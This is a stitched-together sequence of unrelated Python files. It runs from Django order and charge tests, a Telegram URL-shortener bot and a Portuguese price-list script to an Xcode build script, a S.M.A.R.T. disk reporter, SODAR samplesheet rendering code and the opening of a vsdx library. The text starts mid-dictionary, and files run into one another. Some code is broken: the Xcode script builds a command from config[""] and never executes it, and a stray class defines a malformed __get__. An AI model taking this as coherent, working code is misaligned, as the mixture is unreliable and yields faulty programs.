'expiration_datetime': self.one_hour_ago, } self.order_1 = Order.objects.create(**self.order_data_1) # expired order self.charge_data_1 = { 'order': self.order_1, 'amount_paid': 150, 'payment_date': self.one_hour_ago, 'payment_method': 'credit_card', 'status': DomainCharge.CANCELLED, } self.charge_1 = Charge.objects.create(**self.charge_data_1) self.four_days_by_now = datetime.now(timezone.utc) + timedelta(days=4) self.order_data_4 = dict(self.order_data_1) self.order_data_4['expiration_datetime'] = self.four_days_by_now self.order_data_4['hash_id'] = uuid.uuid4() self.order_4 = Order.objects.create(**self.order_data_4) self.charge_data_4 = { 'order': self.order_4, 'amount_paid': 150, 'payment_date': self.four_days_by_now, 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.charge_4 = Charge.objects.create(**self.charge_data_4) self.three_days_by_now = datetime.now(timezone.utc) + timedelta(days=3) self.order_data_3 = dict(self.order_data_4) self.order_data_3['expiration_datetime'] = self.three_days_by_now self.order_data_3['hash_id'] = uuid.uuid4() self.order_3 = Order.objects.create(**self.order_data_3) self.charge_data_3 = { 'order': self.order_3, 'amount_paid': 150, 'payment_date': self.three_days_by_now, 'payment_method': 'credit_card', 'status': DomainCharge.PAID, } self.charge_3 = Charge.objects.create(**self.charge_data_3) self.two_days_by_now = datetime.now(timezone.utc) + timedelta(days=2) self.order_data_2 = dict(self.order_data_3) self.order_data_2['expiration_datetime'] = self.two_days_by_now self.order_data_2['hash_id'] = uuid.uuid4() self.order_2 = Order.objects.create(**self.order_data_2) self.charge_data_2 = { 'order': self.order_2, 'amount_paid': 150, 'payment_date': self.two_days_by_now, 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.charge_2 = Charge.objects.create(**self.charge_data_2) # Some shit happened with webhook and the status were not updated self.order_data_5 = dict(self.order_data_2) self.order_data_5['expiration_datetime'] = self.one_hour_ago # expired order self.order_data_5['hash_id'] = uuid.uuid4() self.order_5 = Order.objects.create(**self.order_data_5) self.charge_data_5 = { 'order': self.order_5, 'amount_paid': 150, 'payment_date': self.two_days_by_now, 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.charge_5 = Charge.objects.create(**self.charge_data_5) user_2 = User.objects.create( email='', first_name='Nome', last_name='Sobrenome', ) talent_2 = Talent.objects.create( user=user_2, phone_number=1, area_code=1, main_social_media='', social_media_username='', number_of_followers=1, ) order_5 = Order.objects.create( hash_id=uuid.uuid4(), talent=talent_2, video_is_for='someone_else', is_from='MJ', is_to='Peter', instruction="Go Get 'em, Tiger", email='', is_public=True, expiration_datetime=self.two_days_by_now, ) charge_data_5 = { 'order': order_5, 'amount_paid': 150, 'payment_date': self.two_days_by_now, 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } Charge.objects.create(**charge_data_5) def test_should_list_just_payment_pre_authorized_orders(self): self.order_data_2['expiration_datetime'] = ( self.order_data_2['expiration_datetime'].isoformat().replace('+00:00', 'Z') ) self.order_data_2['charge'] = { 'amount_paid': '150.00', 'payment_date': self.two_days_by_now.isoformat().replace('+00:00', 'Z'), 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.order_data_4['expiration_datetime'] = ( self.order_data_4['expiration_datetime'].isoformat().replace('+00:00', 'Z') ) self.order_data_4['charge'] = { 'amount_paid': '150.00', 'payment_date': self.four_days_by_now.isoformat().replace('+00:00', 'Z'), 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.order_data_2.pop('hash_id') self.order_data_2['order_hash'] = str(self.order_2.hash_id) self.order_data_4.pop('hash_id') self.order_data_4['order_hash'] = str(self.order_4.hash_id) expected_orders = [self.order_data_2, self.order_data_4] response = self.client.get(reverse('orders:talent_available_orders'), format='json') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.json(), expected_orders) def test_should_list_just_not_fulfilled_orders(self): """Orders that already have a ShoutoutVideo attached, shouldn't be listed to Talent.""" ShoutoutVideo.objects.create( hash_id=uuid.uuid4(), order=self.order_2, talent=self.talent_1, file=SimpleUploadedFile("file.mp4", b"filecontentstring"), ) self.order_data_4['expiration_datetime'] = ( self.order_data_4['expiration_datetime'].isoformat().replace('+00:00', 'Z') ) self.order_data_4['charge'] = { 'amount_paid': '150.00', 'payment_date': self.four_days_by_now.isoformat().replace('+00:00', 'Z'), 'payment_method': 'credit_card', 'status': DomainCharge.PRE_AUTHORIZED, } self.order_data_4.pop('hash_id') self.order_data_4['order_hash'] = str(self.order_4.hash_id) expected_orders = [self.order_data_4] response = self.client.get(reverse('orders:talent_available_orders'), format='json') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.json(), expected_orders) class Reccomandation: def __init__(self, input_text): self.text = input_text def __get__(self, name ): return self.name import pyshorteners from telegram.ext import ConversationHandler from telegram import ChatAction class BotShortener(): __URL_SHORTENER = 2 def __init__(self) -> None: pass def getURL_ShortenerState(self): return self.__URL_SHORTENER def inputUrl(self, update, context): url = update.message.text urlShorter = pyshorteners.Shortener() url = urlShorter.chilpit.short(url) self.sendURL(url, update.message.chat) return ConversationHandler.END def sendURL(self, url, chat): chat.send_action( action = ChatAction.UPLOAD_PHOTO, timeout = None ) chat.send_message( text = url ) Scripts/Tupla/Tupla D5.py listagem = ('Lápis', 1.75, 'Borracha', 2, 'Caderno', 15.90, 'Estojo', 25, 'Transferidor', 4.20, 'Compasso', 9.99, 'Mochila', 120.32, 'Canetas', 22.30, 'Livro', 34.90) print('~' * 50) print(f'{"LISTAGEM DE PREÇOS ":^50}') print('~' * 50) pontos = '.' for pos in range(0, len(listagem)): if pos % 2 == 0: print(f'{listagem[pos]:.<40}', end='') else: print(f'R${listagem[pos]: >8.2f}') print('~' * 50)Eastwu5788/Trump """ Auto build xcode project and create .ipa file """ import os import sys import argparse import configparser import datetime from subprocess import Popen, PIPE py2 = sys.version_info[0] == 2 if py2: reload(sys) sys.setdefaultencoding('utf8') config_path = "./config.ini" def load_config(path): if not path or not os.path.exists(path): path = config_path config_ini = configparser.ConfigParser() config_ini.read(path) return config_ini def check_config(config): """ 检查用户配置 """ target = config["Project"]["target"] if not target: return False, "Please input target name that you want to build" scheme = config["Project"]["scheme"] if not scheme: scheme = target return True, None def prepare_build_path(config): """ 准备打包的路径 """ archive_path = config["archive_path"] ipa_path = config["ipa_path"] if not archive_path.endswith("/"): archive_path += "/" if not ipa_path.endswith("/"): ipa_path += "/" time_str = datetime.datetime.now().strftime("%Y-%M-%d %h:%m:%s") archive_path = archive_path + config["target"] + time_str ipa_path = ipa_path + config["target"] + time_str if not os.path.exists(archive_path): os.makedirs(archive_path, 0o777) if not os.path.exists(ipa_path): os.makedirs(ipa_path, 0o777) config["archive_path"] = archive_path config["ipa_path"] = ipa_path def auto_build_project(path, config): prepare_build_path(config) cmd = """xcodebuild -exportArchive -archivePath '%s' -exportPath '%s' -exportOptionsPlist '%s' """ % (config[""]) def main(): parser = argparse.ArgumentParser(description="Thanks for use this script!") parser.add_argument("-i", "--input", type=str, default=None, help="The path of the xcode project") args = parser.parse_args() if not args.input: print("Error: Project is not exists!") exit(0) config = load_config(path=config_path) success, message = check_config(config) if not success: print(message) exit(0) auto_build_project(args.input, config) print("Success Build!") if __name__ == "__main__": main() 1-10 # import sys # input = sys.stdin.readline N, *a = [int(x) for x in open(0)] a.insert(0, None) first = 1 pres = first count = 0 nex = a[pres] # press the button count += 1 for i in range(N - 1): # operations are at most N-1 times. if nex == 2: break prev = pres pres = nex nex = a[pres] # press the button count += 1 if nex == prev or nex == pres: break if nex == 2: print(count) else: print(-1) """Read S.M.A.R.T. disk information and raise alarms where needed""" import pySMART import tabulate def get_smart_attribute(drive, attribute): for driveattribute in drive.attributes: if not driveattribute: continue if driveattribute.name == attribute: return float(driveattribute.raw) def get_drive_age(drive): hours = get_smart_attribute(drive, 'Power_On_Hours') if not hours: return 'n/a' return str("%8.2f" % (hours / 24 / 365)) + ' years' def get_drive_temperature(drive): temp = get_smart_attribute(drive, 'Temperature_Celsius') if temp: temp = str(temp) + "C" return temp def get_drive_reallocated_sectors(drive): return get_smart_attribute(drive, 'Reallocated_Sector_Ct') def get_drive_information(drive): temp = get_drive_temperature(drive) age = get_drive_age(drive) reallocated_sectors = get_drive_reallocated_sectors(drive) data = [drive.name, drive.assessment, drive.model, drive.serial, drive.capacity, temp, age, reallocated_sectors] return data def get_information_on_drives(devlist): header = ['Name', 'Health', 'Model', 'Serial', 'Capacity', 'Temperature', 'Age (on)', 'Reallocated Sectors'] data = [] for device in devlist.devices: data.append(get_drive_information(device)) return header, data def get_devices(): return pySMART.DeviceList() def format_drive_info(header, drive_info): return '{} has health status: {}\nModel: {}\nTemperature: {}, {} reallocated sectors.\nIts age is {} years.'.format( drive_info[header.index('Name')], drive_info[header.index('Health')], drive_info[header.index('Model')], drive_info[header.index('Temperature')], drive_info[header.index('Reallocated Sectors')], drive_info[header.index('Age (on)')].strip() ) def main(): devlist = get_devices() header, data = get_information_on_drives(devlist) print(tabulate.tabulate(data, header, 'rst')) if __name__ == "__main__": main() """Rendering utilities for samplesheets""" import functools import itertools import logging from packaging import version import re import time from altamisa.constants import table_headers as th from altamisa.isatab.write_assay_study import RefTableBuilder from datetime import date from django.conf import settings # Projectroles dependency from projectroles.app_settings import AppSettingAPI from samplesheets.models import Process, GenericMaterial from samplesheets.utils import get_node_obj header_re = re.compile(r'^([a-zA-Z\s]+)[\[](.+)[\]]$') contact_re = re.compile(r'(.+?)\s?(?:[<|[])(.+?)(?:[>\]])') logger = logging.getLogger(__name__) app_settings = AppSettingAPI() TOP_HEADER_MATERIAL_COLOURS = { 'SOURCE': 'info', 'SAMPLE': 'warning', 'MATERIAL': 'success', 'DATA': 'success', } TOP_HEADER_MATERIAL_VALUES = { 'SOURCE': 'Source', 'SAMPLE': 'Sample', 'MATERIAL': 'Material', 'DATA': 'Data File', } EMPTY_VALUE = '-' STUDY_HIDEABLE_CLASS = 'sodar-ss-hideable-study' SOURCE_SEARCH_STR = '-source-' NARROW_CHARS = 'fIijlt;:.,/"!\'!()[]{}' WIDE_CHARS = 'ABCDEFHKLMNOPQRSTUVXYZ<>%$_' IGNORED_HEADERS = ['Unit', 'Term Source REF', 'Term Accession Number'] # Name fields (NOTE: Missing labeled extract name by purpose) ALTAMISA_MATERIAL_NAMES = [ th.EXTRACT_NAME, th.LIBRARY_NAME, th.SAMPLE_NAME, th.SOURCE_NAME, ] # Attribute list lookup LIST_ATTR_MAP = { th.CHARACTERISTICS: 'characteristics', th.COMMENT: 'comments', th.FACTOR_VALUE: 'factor_values', th.PARAMETER_VALUE: 'parameter_values', } # Basic fields lookup (header -> member of node) BASIC_FIELD_MAP = {th.PERFORMER: 'performer', th.DATE: 'perform_date'} # altamISA -> SODAR header name lookup HEADER_MAP = { th.LABELED_EXTRACT_NAME: 'Label', th.PROTOCOL_REF: 'Protocol', th.PERFORMER: 'Performer', th.DATE: 'Perform Date', } # Map JSON attributes to model attributes MODEL_JSON_ATTRS = [ 'characteristics', 'comments', 'factor_values', 'parameter_values', ] # HACK: Special cases for inline file linking (see issue #817) SPECIAL_FILE_LINK_HEADERS = ['report file'] # Table building --------------------------------------------------------------- class SampleSheetRenderingException(Exception): """Sample sheet rendering exception""" class SampleSheetTableBuilder: """ Class for building a sample sheet table as dict. Contains table cells, their properties and headers, to be rendered as HTML on the site or used in backend operations. """ def __init__(self): self._study = None self._assay = None self._row = [] self._top_header = [] self._field_header = [] self._field_configs = [] self._table_data = [] self._first_row = True self._col_values = [] self._col_idx = 0 self._node_idx = 0 self._field_idx = 0 self._parser_version = None self._edit = False self._sheet_config = None # General Data and Cell Functions ------------------------------------------ @classmethod def _get_value(cls, field): """ Return value of a field which can be either free text or term reference. :param field: Field (string or dict) :return: String """ if isinstance(field, str): return field if isinstance(field, dict) and 'value' in field: if isinstance(field['value'], dict) and 'name' in field['value']: return field['value']['name'] return field['value'] return '' @classmethod def _get_ontology_url(cls, ontology_name, accession): """ Return full URL for ontology reference. :param ontology_name: String :param accession: String (contains an URL) :return: String """ if ( not settings.SHEETS_ONTOLOGY_URL_TEMPLATE or not accession or any(s in accession for s in settings.SHEETS_ONTOLOGY_URL_SKIP) ): return accession # HACK: "HP" is commonly incorrectly provided as "HPO" if ontology_name == 'HPO': ontology_name = 'HP' return settings.SHEETS_ONTOLOGY_URL_TEMPLATE.format( ontology_name=ontology_name, accession=accession ) @classmethod def _get_ontology_link(cls, ontology_name, accession): """ Build ontology link(s). :param ontology_name: Ontology name :param accession: Ontology accession URL :return: String """ return ';'.join( [ cls._get_ontology_url(ontology_name, a) for a in accession.split(';') ] ) def _add_top_header(self, obj, colspan): """ Append columns to top header. :param obj: GenericMaterial or Process object :param colspan: Column count for the node """ if isinstance(obj, GenericMaterial): # Material colour = TOP_HEADER_MATERIAL_COLOURS[obj.item_type] value = ( obj.material_type if obj.material_type and obj.item_type not in ['SOURCE', 'SAMPLE'] else TOP_HEADER_MATERIAL_VALUES[obj.item_type] ) else: # Process colour = 'danger' value = 'Process' th = {'value': value.strip(), 'colour': colour, 'colspan': colspan} if self._edit: th['headers'] = obj.headers # Store the full header for editing self._top_header.append(th) self._node_idx += 1 self._field_idx = 0 def _add_header(self, name, header_type=None, obj=None): """ Add column field header value. :param name: Header name to be displayed as "value" :param header_type: Header type :param obj: Original Django model object """ header = { 'value': name.strip().title(), # TODO: Better titling (#576) 'name': name, # Store original field name 'obj_cls': obj.__class__.__name__, 'item_type': obj.item_type if isinstance(obj, GenericMaterial) else None, 'num_col': False, # Will be checked for sorting later 'config_set': False, } field_config = None # Get existing field config if self._sheet_config: study_config = self._sheet_config['studies'][ str(self._study.sodar_uuid) ] if not self._assay or self._node_idx < len(study_config['nodes']): field_config = study_config['nodes'][self._node_idx]['fields'][ self._field_idx ] else: # Assay a_node_idx = self._node_idx - len(study_config['nodes']) field_config = study_config['assays'][ str(self._assay.sodar_uuid) ]['nodes'][a_node_idx]['fields'][self._field_idx] # Save info on whether a pre-existing config is set for this field if field_config and field_config.get('format'): self._field_configs.append(True) else: self._field_configs.append(False) # Column type (the ones we can determine at this point) if ( field_config and field_config.get('format') in ['double', 'integer'] and not obj.has_unit(name, header_type) ): header['col_type'] = 'NUMERIC' # Else detect type without config elif ( name.lower() == 'name' or name in th.PROCESS_NAME_HEADERS ) and header['item_type'] != 'DATA': header['col_type'] = 'NAME' elif name.lower() == 'protocol': header['col_type'] = 'PROTOCOL' elif 'contact' in name.lower() or name == 'Performer': header['col_type'] = 'CONTACT' elif name == 'Perform Date': header['col_type'] = 'DATE' elif name.lower() == 'external links': header['col_type'] = 'EXTERNAL_LINKS' elif ( name.lower() == 'name' and header['item_type'] == 'DATA' ) or name.lower() in SPECIAL_FILE_LINK_HEADERS: # HACK for issue #817 header['col_type'] = 'LINK_FILE' # Recognize ONTOLOGY by headers elif obj.is_ontology_field(name, header_type): header['col_type'] = 'ONTOLOGY' # Recognize UNIT by headers elif obj.has_unit(name, header_type): header['col_type'] = 'UNIT' else: header['col_type'] = None # Default / to be determined later # Add extra data for editing if self._edit: header['type'] = header_type self._field_header.append(header) self._field_idx += 1 def _add_cell( self, value, header_name, unit=None, link=None, header_type=None, obj=None, tooltip=None, ): """ Add cell data. Also maintain column value list and insert header if on the first row and required parameters are supplied. :param value: Value to be displayed in the cell :param header_name: Name of the column header :param unit: Unit to be displayed in the cell :param link: Link from the value (URL string) :param header_type: Header type (string) :param obj: Original Django model object :param tooltip: Tooltip to be shown on mouse hover (string) """ # Add header if first row if header_name and obj and self._first_row: self._add_header(header_name, header_type=header_type, obj=obj) # Get printable value in case the function is called with a reference if isinstance(value, dict): value = self._get_value(value) cell = {'value': value.strip() if isinstance(value, str) else value} if unit: cell['unit'] = unit.strip() if isinstance(unit, str) else unit if link: cell['link'] = link if tooltip: cell['tooltip'] = tooltip # Add extra data for editing if self._edit: cell['uuid'] = str(obj.sodar_uuid) # Node UUID # Object reference UUID for special cases if header_type == 'protocol': cell['uuid_ref'] = str(obj.protocol.sodar_uuid) self._row.append(cell) # Store value for detecting unfilled columns col_value = 0 if not value else 1 if self._first_row: self._col_values.append(col_value) elif col_value == 1 and self._col_values[self._col_idx] == 0: self._col_values[self._col_idx] = 1 self._col_idx += 1 def _add_ordered_element(self, obj): """ Append GenericMaterial or Process element to row along with its attributes. To be used with altamISA v0.1+, requires the "headers" field in each object. :param obj: GenericMaterial or Pocess object """ old_header_len = len(self._field_header) headers = [h for h in obj.headers if h not in IGNORED_HEADERS] for h in headers: list_ref = re.findall(header_re, h) # Value lists with possible ontology annotation if list_ref: h_type = list_ref[0][0] h_name = list_ref[0][1] if h_type in LIST_ATTR_MAP and hasattr( obj, LIST_ATTR_MAP[h_type] ): obj_attr = getattr(obj, LIST_ATTR_MAP[h_type]) if h_name in obj_attr: self._add_annotation( obj_attr[h_name], h_name, header_type=LIST_ATTR_MAP[h_type], obj=obj, ) # Basic fields we can simply map using BASIC_FIELD_MAP elif h in BASIC_FIELD_MAP and hasattr(obj, BASIC_FIELD_MAP[h]): self._add_cell( getattr(obj, BASIC_FIELD_MAP[h]), HEADER_MAP[h], header_type=BASIC_FIELD_MAP[h], obj=obj, ) # Special case: Name elif h in ALTAMISA_MATERIAL_NAMES or h in th.DATA_FILE_HEADERS: self._add_cell(obj.name, 'Name', header_type='name', obj=obj) # Special case: Labeled Extract Name & Label elif h == th.LABELED_EXTRACT_NAME and hasattr(obj, 'extract_label'): self._add_cell(obj.name, 'Name', header_type='name', obj=obj) self._add_annotation( {'value': obj.extract_label}, HEADER_MAP[th.LABELED_EXTRACT_NAME], header_type='extract_label', obj=obj, ) # Special case: Array Design REF (NOTE: not actually a reference!) elif h == th.ARRAY_DESIGN_REF and hasattr(obj, 'array_design_ref'): self._add_cell( obj.array_design_ref, 'Array Design REF', obj=obj ) # Special case: Protocol Name elif ( h == th.PROTOCOL_REF and hasattr(obj, 'protocol') and obj.protocol ): self._add_cell( obj.protocol.name, HEADER_MAP[th.PROTOCOL_REF], header_type='protocol', obj=obj, ) # Special case: Process Name elif isinstance(obj, Process) and h in th.PROCESS_NAME_HEADERS: self._add_cell(obj.name, h, header_type='process_name', obj=obj) # Special case: First Dimension elif isinstance(obj, Process) and h == th.FIRST_DIMENSION: self._add_annotation( {'value': obj.first_dimension}, 'First Dimension', header_type='first_dimension', obj=obj, ) # Special case: First Dimension elif isinstance(obj, Process) and h == th.SECOND_DIMENSION: self._add_annotation( {'value': obj.second_dimension}, 'Second Dimension', header_type='second_dimension', obj=obj, ) # Add top header if self._first_row: self._add_top_header(obj, len(self._field_header) - old_header_len) def _add_annotation(self, ann, header, header_type, obj): """ Append an ontology annotation or list of values to a row as a single cell. :param ann: Annotation value (string or Dict) :param header: Name of the column header (string) :param header_type: Header type (string or None) :param obj: GenericMaterial or Pocess object the annotation belongs to """ unit = None # Special case: Comments as parsed in SODAR v0.5.2 (see #629) # TODO: TBD: Should these be added in this function at all? if isinstance(ann, str): val = ann # Ontology reference(s) (altamISA v0.1+, SODAR v0.5.2+) elif isinstance(ann['value'], dict) or ( isinstance(ann['value'], list) and len(ann['value']) > 0 and isinstance(ann['value'][0], dict) ): val = [] tmp_val = ann['value'] # Make single reference into a list for simpler rendering if isinstance(ann['value'], dict): tmp_val = [ann['value']] if not tmp_val[0].get('name'): val = '' else: for v in tmp_val: v = dict(v) if isinstance(v['name'], str): v['name'] = v['name'].strip() # Cleanup name elif v['name'] is None: v['name'] = '' if not self._edit: # If not editing, provide user friendly ontology URL v['accession'] = self._get_ontology_url( v['ontology_name'], v['accession'] ) val.append(v) # Basic value string OR a list of strings else: val = ann['value'] # Add unit if present (only for non-list values) # TODO: provide full ontology value for editing once supporting if isinstance(ann, dict) and 'unit' in ann: if isinstance(ann['unit'], dict): unit = ann['unit']['name'] else: unit = ann['unit'] self._add_cell( val, header, unit=unit, link=None, # Link will be retrieved from each ontology term header_type=header_type, obj=obj, tooltip=None, # Tooltip will be retrieved from each ontology term ) # Table building functions ------------------------------------------------- def _append_row(self): """Append current row to table data and cleanup""" self._table_data.append(self._row) self._row = [] self._first_row = False self._col_idx = 0 self._node_idx = 0 self._field_idx = 0 def _add_ui_table_data(self): """Add UI specific data to a table""" # TODO: Un-hackify def _get_length(value, col_type=None): """Return estimated length for proportional text""" if not value: return 0 # Convert perform date if isinstance(value, date): value = str(value) # Lists (altamISA v0.1+) elif isinstance(value, list) and col_type != 'EXTERNAL_LINKS': if isinstance(value[0], dict): value = '; '.join([x['name'] for x in value]) elif isinstance(value[0], list) and value[0]: value = '; '.join([x[0] for x in value]) elif isinstance(value[0], str): value = '; '.join(value) # Very unscientific and font-specific, don't try this at home nc = sum([value.count(c) for c in NARROW_CHARS]) wc = sum([value.count(c) for c in WIDE_CHARS]) return round(len(value) - nc - wc + 0.6 * nc + 1.3 * wc) def _is_num(value): """Return whether a value contains an integer/double""" if isinstance(value, str) and '_' in value: return False # HACK because float() accepts underscore try: float(value) return True except (ValueError, TypeError): return False top_idx = 0 # Top header index grp_idx = 0 # Index within current top header group for i in range(len(self._field_header)): header_name = self._field_header[i]['value'] # Set column type to NUMERIC if values are all numeric or empty # (except if name or process name) # Skip check if column is already defined as UNIT if ( header_name != 'Name' and header_name not in th.PROCESS_NAME_HEADERS and not self._field_configs[i] and self._field_header[i]['col_type'] not in ['NUMERIC', 'UNIT'] and any(_is_num(x[i]['value']) for x in self._table_data) and all( (_is_num(x[i]['value']) or not x[i]['value']) for x in self._table_data ) ): self._field_header[i]['col_type'] = 'NUMERIC' # Maximum column value length for column width estimate field_header_len = round( _get_length(self._field_header[i]['value']) ) # If there is only one column in top header, use top header length if self._top_header[top_idx]['colspan'] == 1: top_header_len = round( _get_length(self._top_header[top_idx]['value']) ) header_len = max(field_header_len, top_header_len) else: header_len = field_header_len col_type = self._field_header[i]['col_type'] if col_type == 'CONTACT': max_cell_len = max( [ ( _get_length( re.findall(contact_re, x[i]['value'])[0][0] ) if re.findall(contact_re, x[i].get('value')) else len(x[i].get('value') or '') ) for x in self._table_data ] ) elif col_type == 'EXTERNAL_LINKS': # Special case, count elements header_len = 0 # Header length is not comparable max_cell_len = max( [ _get_length(x[i]['value'], col_type) if (x[i]['value'] and isinstance(x[i]['value'], list)) else 0 for x in self._table_data ] ) else: # Generic type max_cell_len = max( [ _get_length(x[i]['value'], col_type) + _get_length(x[i].get('unit'), col_type) + 1 for x in self._table_data ] ) self._field_header[i]['max_value_len'] = max( [header_len, max_cell_len] ) if grp_idx == self._top_header[top_idx]['colspan'] - 1: top_idx += 1 grp_idx = 0 else: grp_idx += 1 def _build_table( self, table_refs, node_map=None, study=None, assay=None, ui=True ): """ Build a table from the node graph reference. :param table_refs: Object unique_name:s in a list of lists :param node_map: Lookup dictionary containing objects (optional) :param study: Study object (optional, required if rendering study) :param assay: Assay object (optional, required if rendering assay) :param ui: Add UI specific data if True (boolean) :raise: ValueError if both study and assay are None :return: Dict """ if not study and not assay: raise ValueError('Either study or assay must be defined') self._study = study or assay.study self._assay = assay self._row = [] self._top_header = [] self._field_header = [] self._field_configs = [] self._table_data = [] self._first_row = True self._col_values = [] self._col_idx = 0 row_id = 0 if not node_map: node_map = self.get_node_map(self._study.get_nodes()) for input_row in table_refs: col_pos = 0 # Add elements in row for col in input_row: self._add_ordered_element(node_map[col]) col_pos += 1 self._append_row() row_id += 1 # Aggregate UI specific data if ui: self._add_ui_table_data() ret = { 'top_header': self._top_header, 'field_header': self._field_header, 'table_data': self._table_data, 'col_values': self._col_values, } # Store index of last visible column for UI if ui: ret['col_last_vis'] = ( len(self._col_values) - self._col_values[::-1].index(1) - 1 ) return ret @classmethod def build_study_reference(cls, study, nodes=None): """ Get study reference table for building final table data. :param study: Study object :param nodes: Study nodes (optional) :return: Nodes (list), table (list) """ if not nodes: nodes = study.get_nodes() arcs = study.arcs for a in study.assays.all().order_by('file_name'): arcs += a.arcs def _is_of_starting_type(starting_type, v): """Predicate to select vertices based on starting type.""" return getattr(v, 'item_type', None) == starting_type # starting_type = 'Source Name' tb = RefTableBuilder( nodes, arcs, functools.partial(_is_of_starting_type, 'SOURCE') ) all_refs = tb.run() if not all_refs: error_msg = ( 'RefTableBuilder failed to build a table from graph, unable to ' 'render study. Please ensure the validity of your ISA-Tab files' ) logger.error(error_msg) raise SampleSheetRenderingException(error_msg) return all_refs @classmethod def get_sample_idx(cls, all_refs): """ Get sample index for a reference table. :param all_refs: All references for a study (list). :return: Integer """ return [i for i, col in enumerate(all_refs[0]) if '-sample-' in col][0] @classmethod def get_node_map(cls, nodes): """ Get dict mapped by unique name for a QuerySet or list of node objects. :param nodes: QuerySet or list :return: Dict """ return {n.unique_name: n for n in nodes} @classmethod def get_study_refs(cls, all_refs, sample_idx=None): """ Get study table references without duplicates. :param all_refs: All references for a study. :param sample_idx: Integer for sample column index (optional) :return: List """ if not sample_idx: sample_idx = cls.get_sample_idx(all_refs) sr = [row[: sample_idx + 1] for row in all_refs] return list(sr for sr, _ in itertools.groupby(sr)) @classmethod def get_assay_refs(cls, all_refs, assay_id, sample_idx, study_cols=True): """ Return assay table references based on assay ID. :param all_refs: :param assay_id: Integer for assay ID :param sample_idx: Integer for sample column index :param study_cols: Include study columns if True (bool) :return: List """ assay_search_str = '-a{}-'.format(assay_id) assay_refs = [] start_idx = 0 if study_cols else sample_idx for row in all_refs: if ( len(row) > sample_idx + 1 and assay_search_str in row[sample_idx + 1] ): assay_refs.append(row[start_idx:]) return assay_refs def build_study_tables(self, study, edit=False, use_config=True, ui=True): """ Build study table and associated assay tables for rendering. :param study: Study object :param edit: Return extra data for editing if true (bool) :param use_config: Use sheet configuration in building (bool) :return: Dict """ s_start = time.time() logger.debug( 'Building study "{}" (pk={}, edit={})..'.format( study.get_name(), study.pk, edit ) ) # Get study config for column type detection if use_config: self._sheet_config = app_settings.get_app_setting( 'samplesheets', 'sheet_config', project=study.get_project() ) # HACK: In case of deletion from database bypassing the database, # HACK: make sure the correct UUIDs are in the config if ( self._sheet_config and str(study.sodar_uuid) not in self._sheet_config['studies'] ): logger.warning( 'Unable to use sheet configuration, study UUID not found' ) self._sheet_config = None elif self._sheet_config: logger.debug('Using sheet configuration from app settings') elif not use_config: logger.debug('Not using sheet configuration (use_config=False)') else: logger.debug('No sheet configuration found in app settings') self._edit = edit self._parser_version = ( version.parse(study.investigation.parser_version) if study.investigation.parser_version else version.parse('') ) logger.debug( 'altamISA version at import: {}'.format( self._parser_version if not isinstance(self._parser_version, version.LegacyVersion) else 'LEGACY' ) ) ret = {'study': None, 'assays': {}} nodes = study.get_nodes() all_refs = self.build_study_reference(study, nodes) sample_idx = self.get_sample_idx(all_refs) node_map = self.get_node_map(nodes) # Study ref table without duplicates study_refs = self.get_study_refs(all_refs, sample_idx) ret['study'] = self._build_table( study_refs, node_map, study=study, ui=ui ) logger.debug( 'Building study OK ({:.1f}s)'.format(time.time() - s_start) ) # Assay tables assay_id = 0 for assay in study.assays.all().order_by('pk'): a_start = time.time() logger.debug( 'Building assay "{}" (pk={}, edit={})..'.format( assay.get_name(), assay.pk, edit ) ) assay_refs = self.get_assay_refs(all_refs, assay_id, sample_idx) ret['assays'][str(assay.sodar_uuid)] = self._build_table( assay_refs, node_map, assay=assay, ui=ui ) assay_id += 1 logger.debug( 'Building assay OK ({:.1f}s)'.format(time.time() - a_start) ) return ret def get_headers(self, investigation): """ Return lists of headers for the studies and assays in an investigation. :param investigation: Investigation object :return: Dict """ ret = {'studies': []} for study in investigation.studies.all().order_by('pk'): study_data = {'headers': [], 'assays': []} all_refs = self.build_study_reference(study, study.get_nodes()) sample_idx = self.get_sample_idx(all_refs) study_refs = self.get_study_refs(all_refs, sample_idx) assay_id = 0 for n in study_refs[0]: study_data['headers'] += get_node_obj( study=study, unique_name=n ).headers for assay in study.assays.all().order_by('pk'): assay_refs = self.get_assay_refs(all_refs, assay_id, sample_idx) assay_headers = [] for i in range(sample_idx + 1, len(assay_refs[0])): assay_headers += get_node_obj( assay=assay, unique_name=assay_refs[0][i] ).headers study_data['assays'].append(assay_headers) assay_id += 1 ret['studies'].append(study_data) return ret Vladimir-Ilyin/vsdx from __future__ import annotations import zipfile import shutil import os import re from enum import IntEnum from jinja2 import Template from typing import Optional, List import xml.etree.ElementTree as ET from xml.etree.ElementTree import Element import xml.dom.minidom as minidom # minidom used for prettyprint namespace = "{http://schemas.microsoft.com/office/visio/2012/main}" # visio file name space ext_prop_namespace = '{http://schemas.openxmlformats.org/officeDocument/2006/extended-properties}' vt_namespace = '{http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes}' # utility functions def to_float(val: str): try: if val is None: return return float(val) except ValueError: return 0.0 class PagePosition(IntEnum): FIRST = 0 LAST = -1 END = -1 AFTER = -2 BEFORE= -3 class VisioFile: """Represents a vsdx file :param filename: filename the :class:`VisioFile` was created from :type filename: str :param pages: a list of pages in the VisioFile :type pages: list of :class:`Page` :param master_pages: a list of master pages in the VisioFile :type master_pages: list of :class:`Page` Contains :class:`Page`, :class:`Shape`, :class:`Connect` and :class:`Cell` sub-classes """ def __init__(self, filename, debug: bool = False): """VisioFile constructor :param filename: the vsdx file to load and create the VisioFile object from :type filename: str :param debug: enable/disable debugging :type debug: bool, default to False """ self.debug = debug self.filename = filename if debug: print(f"VisioFile(filename={filename})") self.directory = f"./{filename.rsplit('.', 1)[0]}" self.pages_xml = None self.pages_xml_rels = None self.content_types_xml = None self.app_xml = None self.pages = list() # type: List[VisioFile.Page] # list of Page objects, populated by open_vsdx_file() self.master_pages = list() # type: List[VisioFile.Page] # list of Page objects, populated by open_vsdx_file() self.open_vsdx_file() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.close_vsdx() 